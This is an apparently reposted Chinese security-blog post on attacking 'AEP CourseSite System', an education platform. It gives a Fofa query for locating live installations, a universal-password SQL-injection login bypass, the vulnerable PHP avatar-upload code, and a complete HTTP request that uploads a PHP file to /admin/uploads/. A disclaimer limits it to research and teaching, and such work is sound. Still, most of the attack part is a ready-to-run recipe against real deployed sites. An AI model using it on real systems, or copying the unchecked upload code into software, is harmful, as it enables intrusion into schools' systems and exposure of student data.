国外某教育系统 Sql注入+任意文件上传

admin 2023年12月5日14:46:13评论38 views字数 1579阅读5分15秒阅读模式

Fofa语句:"admin/vendors/jGrowl/jquery.jgrowl.css"

国外某教育系统 Sql注入+任意文件上传

国外某教育系统 Sql注入+任意文件上传

AEP CourseSite System 界面长这样:

国外某教育系统 Sql注入+任意文件上传

直接万能密码进入.

国外某教育系统 Sql注入+任意文件上传

然后头像处可以上传任意文件

国外某教育系统 Sql注入+任意文件上传

student_avatar.php

<?php include('admin/dbcon.php'); include('session.php');                              if (isset($_POST['change'])) {                               
$image = addslashes(file_get_contents($_FILES['image']['tmp_name'])); $image_name = addslashes($_FILES['image']['name']); $image_size = getimagesize($_FILES['image']['tmp_name']);
move_uploaded_file($_FILES["image"]["tmp_name"], "admin/uploads/" . $_FILES["image"]["name"]); $location = "uploads/" . $_FILES["image"]["name"]; mysqli_query($conn,"update student set location = '$location' where student_id = '$session_id' ")or die(mysqli_error($conn)); ?> <script> window.location = "dashboard_student.php"; </script>
<?php } ?>

Payload:

POST /student_avatar.php?change HTTP/1.1Host: x.x.x.xContent-Length: 202Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: nullContent-Type: multipart/form-data; boundary=----WebKitFormBoundarydAPjrmyKewWuf59HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.3611Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,ru;q=0.8Connection: close
------WebKitFormBoundarydAPjrmyKewWuf59HContent-Disposition: form-data; name="image"; filename="c1.php"Content-Type: image/jpg
<?php phpinfo();?>------WebKitFormBoundarydAPjrmyKewWuf59H--

文件上传在 /admin/uploads/ 目录下.

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,文章作者和本公众号不承担任何法律及连带责任,望周知!!!

原文始发于微信公众号(星悦安全):国外某教育系统 Sql注入+任意文件上传

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月5日14:46:13
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   国外某教育系统 Sql注入+任意文件上传https://cn-sec.com/archives/2268686.html

发表评论

匿名网友 填写信息